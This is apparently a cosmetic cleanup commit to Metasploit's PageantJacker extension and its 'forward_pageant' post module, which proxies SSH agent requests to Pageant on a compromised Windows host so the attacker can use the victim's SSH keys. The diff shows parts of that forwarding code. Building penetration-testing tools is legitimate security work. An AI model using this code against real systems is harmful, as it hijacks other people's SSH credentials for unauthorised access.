MSFTidy

2015-05-19 14:42:30 +01:00 · 2015-05-19 14:42:30 +01:00 · b2aef62a40
parent f8fce7b7f6
commit b2aef62a40
3 changed files with 22 additions and 38 deletions
--- a/lib/rex/post/meterpreter/extensions/pageantjacker/pageantjacker.rb
+++ b/lib/rex/post/meterpreter/extensions/pageantjacker/pageantjacker.rb
@ -33,15 +33,12 @@ class Pageantjacker < Extension
  def forward_to_pageant(blob,size)
        return unless size > 0
        return unless blob.size > 0
-        #puts "Request indicated size: #{size}"
-        #parse_blob(blob)

-        # Create the packet
        packet_request = Packet.create_request('pageant_send_query')
        packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANTJACKER_SIZE_IN, size)
        packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANTJACKER_BLOB_IN, blob)
-        
-        response = client.send_request(packet_request)  
+
+        response = client.send_request(packet_request)
        return nil if !response

        pageant_plugin_response = {
@ -53,18 +50,6 @@ class Pageantjacker < Extension
        return pageant_plugin_response
  end

-#  def parse_blob(blob)
-#    b = blob.unpack('NCH*')
-#    puts " blob size #{blob.size}"
-#    puts " blob data (20 chars: #{blob.unpack('H20').first}"
-#    puts "   ssh packet size: #{b[0]}"
-#    puts "   ssh type: #{b[1]}"
-#    puts "   ssh data: #{b[2]}"
-#  end
-
-#  def stop_listening
-#  end
-
 end

 end; end; end; end; end
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/pageantjacker.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/pageantjacker.rb
@ -6,11 +6,9 @@ module Post
 module Meterpreter
 module Ui

-require 'tmpdir'
-
 ###
 #
-# PageantJacker extension 
+# PageantJacker extension
 #
 ###
 class Console::CommandDispatcher::PageantJacker
@ -23,17 +21,18 @@ class Console::CommandDispatcher::PageantJacker
    super
    print_line
    print_line
-	print_line("       .mMMMMMm.             mMMm    M  WWW   W    W  RRRRR")
-	print_line("      mMMMMMMMMMMM.            MM   MM    W   W   W    R   R")
-	print_line("     /MMMM-    -MM.            MM   MM    W   W   W    R   R")
-	print_line("    /MMM.    _  \/  ^          M M M M     W W W W     RRRR")
-	print_line("    |M.    aRRr    /W|         M M M M     W W W W     R  R")
-	print_line("    \/  .. ^^^   wWWW|         M  M  M      W   W      R   R")
-	print_line("       /WW\.  .wWWWW/          M  M  M      W   W      R    R")
-	print_line("       |WWWWWWWWWWW/")
-	print_line("         .WWWWWW.                  PageantJacker Extension")
+    print_line("       .mMMMMMm.             mMMm    M  WWW   W    W  RRRRR")
+    print_line("      mMMMMMMMMMMM.            MM   MM    W   W   W    R   R")
+    print_line("     /MMMM-    -MM.            MM   MM    W   W   W    R   R")
+    print_line("    /MMM.    _  \/  ^          M M M M     W W W W     RRRR")
+    print_line("    |M.    aRRr    /W|         M M M M     W W W W     R  R")
+    print_line("    \/  .. ^^^   wWWW|         M  M  M      W   W      R   R")
+    print_line("       /WW\.  .wWWWW/          M  M  M      W   W      R    R")
+    print_line("       |WWWWWWWWWWW/")
+    print_line("         .WWWWWW.                  PageantJacker Extension")
+    print_line("                             stuart.morgan@mwrinfosecurity.com")
    print_line
-    print_line(" Use post/windows/manage/forward_pageant to proxy agent requests through Pageant")
+    print_line(" Use post/windows/manage/forward_pageant to proxy through Pageant")
    print_line
  end

--- a/modules/post/windows/manage/forward_pageant.rb
+++ b/modules/post/windows/manage/forward_pageant.rb
@ -13,7 +13,7 @@ class Metasploit3 < Msf::Post

  def initialize(info={})
    super( update_info( info,
-        'Name'          => 'Forward SSH agent requests to Pageant',
+        'Name'          => 'Forward SSH Agent Requests To Remote Pageant',
        'Description'   => %q{
            This module forwards SSH agent requests from a local socket to a remote Pageant instance.
            If a target Windows machine is compromised and is running Pageant, this will allow the
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Post
            loaded into the remote meterpreter session by this module if it is not already loaded.
          },
        'License'       => MSF_LICENSE,
-        'Author'        => [ 
+        'Author'        => [
            'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>',
        ],
        'Platform'      => [ 'win' ],
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Post
    if ::File.exists?(@sockpath)
        print_error("Your requested socket (#{@sockpath}) already exists. Remove it or choose another path and try again.")
        return false
-    end 
+    end

    # Open the socket and start listening on it. Essentially now forward traffic between us and the remote Pageant instance.
    ::UNIXServer.open(@sockpath) {|serv|
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Post
      print_status("Set SSH_AUTH_SOCK variable to #{@sockpath} (e.g. export SSH_AUTH_SOCK=\"#{@sockpath}\")")
      print_status("Now use any tool normally (e.g. ssh-add)")

-      loop { 
+      loop {
        s = serv.accept
        loop {
          socket_request_data = s.recvfrom(8192)
@ -79,14 +79,14 @@ class Metasploit3 < Msf::Post
          vprint_status("PageantJacker: Received data from socket (size: #{socket_request_data.first.size})")
          response = client.pageantjacker.forward_to_pageant(socket_request_data.first, socket_request_data.first.size)
          if response[:success]
-            s.send response[:blob],0 
+            s.send response[:blob],0
            vprint_status("PageantJacker: Response received (Success='#{response[:success]}' Size='#{response[:blob].size}' Error='#{response[:error]}')")
          else
            print_error("PageantJacker: Unsuccessful response received (#{response[:error]})")
          end
-        }   
-      }   
-    }   
+        }
+      }
+    }

  end